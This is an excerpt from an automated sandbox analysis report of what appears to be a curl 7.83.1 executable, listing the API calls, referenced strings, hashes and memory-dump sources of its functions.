                                        • Opcode Fuzzy Hash: 3355ff839ac93e217661dbcaf82122303229609540b15249d6e6f307ae447239
                                        • Instruction Fuzzy Hash: F7514431704219EFDB598B24EC80BF97BA6EF44310F18817AED058B792CB709C51ABA0
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000C2AC3
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2ADE
                                        • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00117348), ref: 000C2AFC
                                        • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00117348), ref: 000C2B19
                                        • _mkdir.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000), ref: 000C2B9F
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000C2BAA
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000C2BB5
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C2BD0
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2BDB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _errnofreestrtok$_mkdir_strdupmalloc
                                        • String ID: %s%s
                                        • API String ID: 2356461126-3252725368
                                        • Opcode ID: c9cde391a7b0a76ef054a2f29b0ff545870b4b5b7eec27d2d68bc11db8f9942b
                                        • Instruction ID: 1a0721ad6a095d2a1f1f19039c81317854ddb2fd299017d1dd534859699aab25
                                        • Opcode Fuzzy Hash: c9cde391a7b0a76ef054a2f29b0ff545870b4b5b7eec27d2d68bc11db8f9942b
                                        • Instruction Fuzzy Hash: BB418F35508611EFDB295F74AC44FEE7BF5AF55760B20416EF811D7A81DB708C4186B0
                                        APIs
                                        • GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 000D0B6D
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 000D0B74
                                        • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,00000000,00000002,?), ref: 000D0C07
                                        • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000001,?), ref: 000D0C15
                                        • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000020,?,?,00000001,?), ref: 000D0C23
                                        • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 000D0C31
                                        • VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 000D0C3D
                                        • RtlVerifyVersionInfo.NTDLL(?,?,00000008,00000001), ref: 000D0C5E
                                        • VerifyVersionInfoW.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-1(?,0000003B,00000000,?,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 000D0C68
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ConditionMask$InfoVerifyVersion$AddressHandleModuleProc
                                        • String ID: RtlVerifyVersionInfo$ntdll
                                        • API String ID: 574519269-1699696460
                                        • Opcode ID: bf6270d50af0ae20e53b1a6973a73df55a0404647be42af179e2f99eeed0374f
                                        • Instruction ID: 528f29cf5c58ca211010e0fb6017a6837586cc3a54d6500cd970962e1ea43cb5
                                        • Opcode Fuzzy Hash: bf6270d50af0ae20e53b1a6973a73df55a0404647be42af179e2f99eeed0374f
                                        • Instruction Fuzzy Hash: 5331C272548381EFE7218F749C09BAE7BE9FB85714F044A1EF58496291C7B489848B72
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F0C07
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %s auth using %s with user '%s'$Authorization$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-authorization$Server
                                        • API String ID: 1294909896-3316699798
                                        • Opcode ID: 31a6d466ffd660c7f72cc2df71b4c7e4622811d12583ff4ab1050024d6d9213c
                                        • Instruction ID: 5499e9e9c8215fc39a6e250811b36ad8de5303baf373f641256fb7414852df34
                                        • Opcode Fuzzy Hash: 31a6d466ffd660c7f72cc2df71b4c7e4622811d12583ff4ab1050024d6d9213c
                                        • Instruction Fuzzy Hash: FB41793130020DEBCF289B6499507BEB7E2AF90314F24811AE985A7BC3CB71AD00B791
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB20
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB42
                                        • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: callocmallocrealloc
                                        • String ID: $ $ $-$>
                                        • API String ID: 3005434335-2764683982
                                        • Opcode ID: cffc967782b2bd0acb4ec27598edeafd4c88f30de89abacab5949edce2377757
                                        • Instruction ID: 581f6cc69c4f2af525dbf734695454aeeafe8a3287df108380c7d79634a172b9
                                        • Opcode Fuzzy Hash: cffc967782b2bd0acb4ec27598edeafd4c88f30de89abacab5949edce2377757
                                        • Instruction Fuzzy Hash: D7816670A14A06AFD728CF69E544725BBF2FB44310F18862AD486C7AD1D7B1F891CBD2
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000D4D69
                                        • _strrchr.LIBCMT ref: 000D4D7E
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000D4D8E
                                        • _strrchr.LIBCMT ref: 000D4DE2
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000D4E13
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000D4E1F
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,000C9BEA,?,00000208,?,?,?,?,?,000CA827,?,?,00000000), ref: 000D4E73
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000C9BEA,?,00000208,?,?,?,?,?,000CA827,?,?,00000000), ref: 000D4E8E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,000C9BEA,?,00000208,?,?), ref: 000D4EE0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchr$_strrchrfree$malloc
                                        • String ID: )i
                                        • API String ID: 3226260525-38996014
                                        • Opcode ID: 294442a988c4d1618c9db2244e54685b3f7600a8fe717f6c7cf31b2f31c77144
                                        • Instruction ID: 52aa74a2e67425dda2fa48cd46475e323792bc1098278c210ba6d5a067a22b09
                                        • Opcode Fuzzy Hash: 294442a988c4d1618c9db2244e54685b3f7600a8fe717f6c7cf31b2f31c77144
                                        • Instruction Fuzzy Hash: 6D514831908396BFDB258F6898542AE7BE6EF52350F28407FE08197382EB709C45C771
                                        APIs
                                        • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 000F7E69
                                        • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 000F7ECD
                                        • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 000F7F6D
                                        • WSAGetLastError.WS2_32(?,?,00000000), ref: 000F7F78
                                        • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,00000000), ref: 000F7FBE
                                        Strings
                                        • Received last DATA packet block %d again., xrefs: 000F7F0D
                                        • Timeout waiting for block %d ACK. Retries = %d, xrefs: 000F7DC3
                                        • Received unexpected DATA packet block %d, expecting block %d, xrefs: 000F7FC9
                                        • tftp_rx: internal error, xrefs: 000F7D97
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: sendto$ErrorLast_time64
                                        • String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error
                                        • API String ID: 3931062552-2298932677
                                        • Opcode ID: 987f969f9aed096da341e872ce37aa03d2ca752ef2d61ff04403ff372a375ca7
                                        • Instruction ID: f195c1f8b205bead5445a293335bb754c1b6fd91264f7099a257fc5cf2df9fcd
                                        • Opcode Fuzzy Hash: 987f969f9aed096da341e872ce37aa03d2ca752ef2d61ff04403ff372a375ca7
                                        • Instruction Fuzzy Hash: A7719F70208744DFD3358F24CC85FF7BBE5AB59700F04886EEA9E876A1D274A948DB61
                                        APIs
                                        • _strrchr.LIBCMT ref: 000CD165
                                        • _strrchr.LIBCMT ref: 000CD16F
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(001174AB), ref: 000CD198
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000002), ref: 000CD1D9
                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000001), ref: 000CD1F4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 000CD27A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000CD2A4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000CD2BD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$_strrchr$_strdupmallocstrncpy
                                        • String ID: ://$|<>"?*
                                        • API String ID: 1245388853-1792949323
                                        • Opcode ID: c9fc2b0b479589ee994a1018dae484848ad9a25c32ad092736a9ea7530dcd7e4
                                        • Instruction ID: b3ffe0c39814d35a79ec5cce3f3336f8492f4ccf50cb292d525849c121d9688b
                                        • Opcode Fuzzy Hash: c9fc2b0b479589ee994a1018dae484848ad9a25c32ad092736a9ea7530dcd7e4
                                        • Instruction Fuzzy Hash: 28514932A04612AFDB355BA8D864FFEB7E59B62310F28407FEC419B282D770CD419390
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010F232
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0010F280
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0010F309
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010F359
                                        Strings
                                        • schannel: server certificate name verification failed, xrefs: 0010F328
                                        • schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names, xrefs: 0010F33A
                                        • schannel: CertGetNameString() returned no certificate name information, xrefs: 0010F20E
                                        • schannel: connection hostname (%s) did not match against certificate name (%s), xrefs: 0010F2E0
                                        • schannel: connection hostname (%s) validated against certificate name (%s), xrefs: 0010F2C9
                                        • schannel: CertGetNameString() returned certificate name information of unexpected size, xrefs: 0010F254
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$_strdupmalloc
                                        • String ID: schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names$schannel: CertGetNameString() returned certificate name information of unexpected size$schannel: CertGetNameString() returned no certificate name information$schannel: connection hostname (%s) did not match against certificate name (%s)$schannel: connection hostname (%s) validated against certificate name (%s)$schannel: server certificate name verification failed
                                        • API String ID: 111713529-4178580626
                                        • Opcode ID: 86b7cd82487365d293f5fbdb3c375a41e0d6f01d6968ca3a37978f4468731300
                                        • Instruction ID: 71afcc75986e27a8149ab5e9b3ba118342c2b419270d59b0f29f1203348833d9
                                        • Opcode Fuzzy Hash: 86b7cd82487365d293f5fbdb3c375a41e0d6f01d6968ca3a37978f4468731300
                                        • Instruction Fuzzy Hash: 3C411E36A04204AADB399E58DC029AD77B5EFC5760F21407EF485A76C1DBB09D43C790
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,000E1751,?,00000000,?,?,?,000C8BF9), ref: 000E6D39
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,000C8BF9), ref: 000E6D52
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000C8BF9), ref: 000E6D69
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C8BF9), ref: 000E6D80
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6D97
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DAE
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DC5
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DDC
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6DF3
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E0A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E21
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E38
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E4F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E6E66
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 32e146b434e63e71db08f0dc662a587833e209b9d855eeff6a6124f56296a8e6
                                        • Instruction ID: f0d628fe87f964be97eef94f7250c74308797629f4a3553467639c4603f1f620
                                        • Opcode Fuzzy Hash: 32e146b434e63e71db08f0dc662a587833e209b9d855eeff6a6124f56296a8e6
                                        • Instruction Fuzzy Hash: EC418671A24926EFCB085F24ED48458BBB6FF48361310912FE41293E61CBB4BCA18FD5
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?), ref: 00102A8C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?), ref: 00102A9E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?), ref: 00102ABA
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?), ref: 00102ACE
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?), ref: 00102AE7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: /$MAILINDEX$PARTIAL$SECTION$UID$UIDVALIDITY
                                        • API String ID: 1294909896-4153388952
                                        • Opcode ID: de25a833d085af2156ae6e9aabc259f217b23c02858d0656935a2df090f8c31f
                                        • Instruction ID: 4a2869a03f4dff43d0e0cd050b691a5de9bdb1c7b67da9e4e38afec5c341aeb9
                                        • Opcode Fuzzy Hash: de25a833d085af2156ae6e9aabc259f217b23c02858d0656935a2df090f8c31f
                                        • Instruction Fuzzy Hash: 6C81CC30A04346DFDF34DF64C858AADBBB5EF94314F24806ED882A3A92DBB09D41CB51
                                        APIs
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed,?,?,?,?,00000000), ref: 000CE483
                                        Strings
                                        • %-3s %-3s %s %s %5I64d %5I64d %5I64d %s %s %s %s %5s, xrefs: 000CE949
                                        • %3I64d, xrefs: 000CE686, 000CE6DF
                                        • DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed, xrefs: 000CE47E
                                        • --:--:--, xrefs: 000CE8A1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: fputs
                                        • String ID: %-3s %-3s %s %s %5I64d %5I64d %5I64d %s %s %s %s %5s$%3I64d$--:--:--$DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed
                                        • API String ID: 1795875747-33453460
                                        • Opcode ID: 589f91fdc850d7ecf56fe6afbdf0bd1e5a6f8af44a31d303c929de2e51d23f60
                                        • Instruction ID: 9ffc2089140948ab4b24f2272b82de94d463b5dc640362ae57d6499c98d17874
                                        • Opcode Fuzzy Hash: 589f91fdc850d7ecf56fe6afbdf0bd1e5a6f8af44a31d303c929de2e51d23f60
                                        • Instruction Fuzzy Hash: 60024675D00298AFDB25CFA8D884BEDBBB5FF48304F2441AEE408AB252D7715996CF50
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C85D1
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C861E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C864D
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000310), ref: 000C867C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C86F7
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C8795
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$_strdup$malloc
                                        • String ID: %s$--url$option %s: %s
                                        • API String ID: 854390910-3421415073
                                        • Opcode ID: df79a856d94fbcaab7858a95a0b29b76e272d1fb53366ee8db68bbf3d4719146
                                        • Instruction ID: 3f74a2171c919ea97d06206170b2d7900ec8478533ac6a68a50210cc887daf56
                                        • Opcode Fuzzy Hash: df79a856d94fbcaab7858a95a0b29b76e272d1fb53366ee8db68bbf3d4719146
                                        • Instruction Fuzzy Hash: 5561E435A08105AFCB69DBA8D488FEEBBF1AB44310F24C1AEE545A7251EF70DD81C758
                                        APIs
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C7E8E
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00117A20), ref: 000C7EA0
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7EB2
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C7ECF
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C7EDB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7F11
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C7F21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __acrt_iob_funcfree$_strdupfclosefopen
                                        • String ID: <stdin>$Failed to read %s
                                        • API String ID: 229151352-3349806160
                                        • Opcode ID: e00c092484663607d23e100193e10439646c02dd8ffb35b93725cb84ce2029a8
                                        • Instruction ID: c9a321e4317c8c088254b1955740f932d3db9885ed17f8bba7ba7a7107ba4e92
                                        • Opcode Fuzzy Hash: e00c092484663607d23e100193e10439646c02dd8ffb35b93725cb84ce2029a8
                                        • Instruction Fuzzy Hash: F031917160C741DFC7599F349884BEEBBE5AB9A351F14496EF49AC3140EB3198818B42
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(curl/7.83.1), ref: 000CDAFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strdup
                                        • String ID: Accept$Accept: application/json$Content-Type$Content-Type: application/json$curl/7.83.1$host$out of memory$proxy
                                        • API String ID: 1169197092-2108368468
                                        • Opcode ID: 808bfde5e1bb3ce541774db8139f061df94615243cc9fde4d7de1a139e90ff30
                                        • Instruction ID: f6b8189483d34f2e55541fef96a0715c6c4cf4e5657a6ff59f35950707b1797e
                                        • Opcode Fuzzy Hash: 808bfde5e1bb3ce541774db8139f061df94615243cc9fde4d7de1a139e90ff30
                                        • Instruction Fuzzy Hash: E5219F353087059FEF25AB25A461FAFB7E6DB84364F20443FE44AA7287EB709C45CA11
                                        APIs
                                        • puts.API-MS-WIN-CRT-STDIO-L1-1-0(Usage: curl [options...] <url>), ref: 000C89A9
                                        • puts.API-MS-WIN-CRT-STDIO-L1-1-0(This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".), ref: 000C89C3
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000C8A13
                                        Strings
                                        • category, xrefs: 000C89E6
                                        • all, xrefs: 000C89CC
                                        • Usage: curl [options...] <url>, xrefs: 000C89A2
                                        • Invalid category provided, here is a list of all categories:, xrefs: 000C8A01
                                        • This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all"., xrefs: 000C89BE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
